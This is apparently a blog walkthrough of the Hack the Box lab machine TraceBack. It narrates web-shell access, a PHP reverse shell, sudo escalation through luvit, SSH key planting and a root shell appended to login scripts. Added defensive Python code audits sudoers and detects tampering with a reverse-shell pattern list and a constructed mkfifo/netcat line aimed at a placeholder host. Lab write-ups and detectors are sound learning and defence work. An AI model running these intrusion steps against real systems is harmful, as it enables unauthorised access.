035#:HTB - TraceBack

TraceBack - Title Card

     A new week and another room. This time it is TraceBack on Hack the Box. This one is rated a bit tougher by users than the others we’ve been doing, so there may be something tricky with this one.

TraceBack - Nmap

     There isn’t much going on here. I start by getting a gobuster scan running and begin poking around the website.

TraceBack - Site 1

     Looks like this server has already been owned, very spooky. But they claim to have left a backdoor that we will probably want to use. I found another hint in the source code of the page.

TraceBack - Site 2

     I got unusually stuck at this point. There is virtually nothing to go off of right now, so I did a couple of guided mode questions to catch back up. The second question has us googling the message we found in the source code.

     This is slightly annoying for a couple of reasons. I don’t think it is realistic, so it’s frustrating to waste time only to learn that was the solution, and I would be worried that googling something like that would just give me walkthroughs to this room. It’s not like looking up an exploit; it’s a quote from a fictional hacker. But anyway, let’s move on.

     Searching the hacker’s message leads us to this repo with some web shells. The hint told us to check PHP, so I just started navigating to each PHP web shell as a path on the site until I got one that worked.

     Attempting to log in using admin/admin works. I started poking around a little, beginning with the Console tab. I found a note on our user’s desktop about Lua.

TraceBack - Site 4

     Found another hidden message.

     This hint doesn’t mean much to me right now, though. I’ve never used a premium web shell like this, so I kept poking around various functions. Checking our sudo rights proves interesting.

TraceBack - Site 6

     This web shell feels clunky, though, so I made a PHP reverse shell payload on my machine, spun up a Python web server, and downloaded the payload to the victim’s webroot folder. After starting a listener, we can navigate to “http://10.10.10.181/payload.php” in our web browser to get a shell.

TraceBack - Shell 1

     I moved to stabilize my shell before exploring further. Then I copied and ran LinPEAS on the victim while I began exploring the sudo rights more. Running the command as the sysadmin user gets us some sort of application CLI. Looking up luvit, I see it’s a scripting engine for Lua, which makes sense with that hint we saw earlier. I referenced GTFObins to help make a Lua payload.

TraceBack - Lateral 1

     I had to play with the syntax a bit and learn more about how luvit REPL works, but then I was able to use the Shell exploit listed on GTFObins to get access to the sysadmin account. This also gets us our first flag.
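The weakness here is a sudo rule that lets a low-privileged user run an interpreter (luvit) as another account with no fixed arguments, which GTFObins documents as a trivial shell escape. As an added, defender-side example (my code, not from the original post and not HTB's), here is a small Python audit that parses sudoers-style user specifications and flags rules granting ALL or an unrestricted shell-capable interpreter. The sample sudoers text, the user names in it and the `SHELL_CAPABLE` list are constructed for the example and are not the box's real configuration.

```python
import re
from typing import List, Tuple

# Binaries that GTFObins documents as able to spawn an interactive shell when
# run under sudo. Constructed, deliberately short list for this example.
SHELL_CAPABLE = {
    "luvit", "lua", "python", "python3", "perl", "ruby", "node",
    "vi", "vim", "less", "more", "find", "awk", "bash", "sh",
}

# user  host = (runas) TAG: cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG_RE = re.compile(r"^([A-Z_]+):\s*")

# Constructed sample; not the machine's actual sudoers file.
SAMPLE_SUDOERS = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
webuser  ALL=(sysadmin) NOPASSWD: /home/sysadmin/luvit
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/less
deploy   ALL=(root) /usr/bin/systemctl restart nginx
"""


def parse_rules(text: str):
    """Yield (user, runas, tags, commands) for each user-spec line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags = []
        tag = TAG_RE.match(rest)
        while tag:
            tags.append(tag.group(1))
            rest = rest[tag.end():]
            tag = TAG_RE.match(rest)
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        # sudoers defaults the target user to root when (runas) is omitted
        yield m.group("user"), m.group("runas") or "root", tags, commands


def audit_sudoers(text: str) -> List[Tuple[str, str, str, bool, str]]:
    """Return (user, runas, command, nopasswd, reason) for risky rules."""
    findings = []
    for user, runas, tags, commands in parse_rules(text):
        if user == "root":
            continue  # root already has everything; flagging it is noise
        for cmd in commands:
            parts = cmd.split()
            name = parts[0].rsplit("/", 1)[-1]
            if parts[0] == "ALL":
                reason = "unrestricted command set"
            elif name in SHELL_CAPABLE and len(parts) == 1:
                # No arguments listed means the caller may pass any arguments,
                # so an interpreter/pager here is a direct shell as `runas`.
                reason = f"{name} can spawn a shell (GTFObins) with free arguments"
            else:
                continue
            findings.append((user, runas, cmd, "NOPASSWD" in tags, reason))
    return findings


if __name__ == "__main__":
    for user, runas, cmd, nopw, reason in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD " if nopw else ""
        print(f"{user} -> {runas}: {flag}{cmd}  [{reason}]")
```

The rule with pinned arguments (`systemctl restart nginx`) is left alone on purpose: sudoers only permits that exact invocation, which is the shape a rule like the luvit one should have taken if it was needed at all. The list is intentionally incomplete (rsync, for instance, is also on GTFObins), so treat it as a starting point and extend it for the environment you are auditing.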

TraceBack - Flag 1

     After getting that, I ran a Python reverse shell script because the current shell was horrible. I moved back to /tmp and ran LinPEAS as our new user. LinPEAS flagged a highly likely escalation path that we are going to explore first.

TraceBack - Nano 1

     I struggled here for a while. It looks like these logon scripts are reverted very shortly after editing them, and I need to be able to trigger them with a login. I generated SSH keys on my machine and put the public one into the /home/sysadmin/.ssh/authorized_keys file, then confirmed I can log in via SSH.

TraceBack - SSH 2

     Now the madness began. The setup was simple, but finding a payload that would work and doing it fast enough was giving me trouble. Basically, I had three terminal windows open for this portion: one running a netcat listener, one ready to log in via SSH, and a third already logged into SSH so that I could echo a reverse shell payload onto the end of one of the logon scripts.

     These scripts are getting reverted every few seconds, though, so we have to edit the script and then try to connect via SSH right away. You can see a bunch of my failed attempts, but the one that worked was a mkfifo netcat shell. It also only kind of worked the first time: the shell locked up and I had to start over. I thought it didn’t work at first, but I looped back to it since it got further than the other shells.

     Finally I was able to get the timing and payload right. We can see we now have a new session as root and of course our final flag.
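The root path relies on login scripts that run with root privileges and are writable by a lower-privileged account; the periodic revert on the box is a crude restore, not detection. As an added defender-side example (my code, not from the original post and not HTB's), here is a Python file-integrity check for a directory of such scripts: it baselines SHA-256 digests, reports added, removed and modified files, and scans any changed file for strings typical of reverse-shell one-liners (the mkfifo/netcat pattern the post mentions among them). The `demo()` function builds a constructed script directory in a temp folder, tampers with one file and re-checks it; the file names, contents, the placeholder host and the `SUSPICIOUS` pattern list are all constructed for the example. On an Ubuntu host the MOTD scripts under /etc/update-motd.d are one directory this fits, though the page does not name the box's path.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Fragments that commonly appear in reverse-shell one-liners and have no
# business in a login/MOTD script. Constructed detection list for this example.
SUSPICIOUS = [
    re.compile(r"\bmkfifo\b"),
    re.compile(r"\b(nc|ncat|netcat)\b"),
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bbash\s+-i\b"),
]


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(directory: str) -> Dict[str, str]:
    """Map each regular file in `directory` to its SHA-256 digest."""
    return {
        name: sha256_file(os.path.join(directory, name))
        for name in sorted(os.listdir(directory))
        if os.path.isfile(os.path.join(directory, name))
    }


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, list]:
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(n for n in baseline
                           if n in current and baseline[n] != current[n]),
    }


def suspicious_lines(path: str) -> List[Tuple[int, str]]:
    """Return (line_number, line) for every line matching a SUSPICIOUS pattern."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as f:
        for lineno, line in enumerate(f, 1):
            if any(p.search(line) for p in SUSPICIOUS):
                hits.append((lineno, line.rstrip("\n")))
    return hits


def check_directory(directory: str, baseline: Dict[str, str]) -> Dict[str, object]:
    """Diff against the baseline and scan every added or modified file."""
    report = diff_snapshots(baseline, snapshot(directory))
    report["suspicious"] = {
        n: suspicious_lines(os.path.join(directory, n))
        for n in report["added"] + report["modified"]
    }
    return report


def demo() -> Dict[str, object]:
    """Build a constructed script directory, baseline it, tamper, re-check."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "00-header"), "w") as f:
        f.write("#!/bin/sh\nprintf 'Welcome\\n'\n")
    with open(os.path.join(d, "50-motd-news"), "w") as f:
        f.write("#!/bin/sh\ncat /var/run/motd.dynamic 2>/dev/null\n")
    baseline = snapshot(d)
    # Constructed tamper line with a placeholder host; it is only text in a
    # temp file and is never executed by this script.
    with open(os.path.join(d, "00-header"), "a") as f:
        f.write("mkfifo /tmp/x; nc ATTACKER_HOST_PLACEHOLDER 4444 </tmp/x\n")
    return check_directory(d, baseline)


if __name__ == "__main__":
    report = demo()
    print("modified:", report["modified"])
    for name, hits in report["suspicious"].items():
        for lineno, text in hits:
            print(f"{name}:{lineno}: {text}")
```

In practice the baseline would be stored outside the monitored host (or at least outside the writable tree) and the check run from cron or a file-watch; an append to a root-executed login script should raise an alert rather than be silently reverted, and the underlying fix is the directory's permissions, not the revert loop.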

     This room was an interesting one and a bit frustrating at first. I don’t mind spending a bunch of time working through a room if there is a valuable lesson to be learned, but for getting initial access I think the hacker’s comment in the source code was a bad segue.

     I don’t search for things too specific to a room, to avoid spoilers, so I would never be inclined to google the phrase “Some of the best web shells that you might need”. I’d be worried that searching a random phrase like that would be so specific to the room that it would just result in the answer/walkthroughs.

     Walkthroughs are a great tool (especially mine), but I really like to push myself before seeking a hint. But to push myself and then learn that it was something I find unrealistic just feels like a waste of time. Overall, not my favorite room but I still enjoyed working through it.

[CATZ....HACKS]
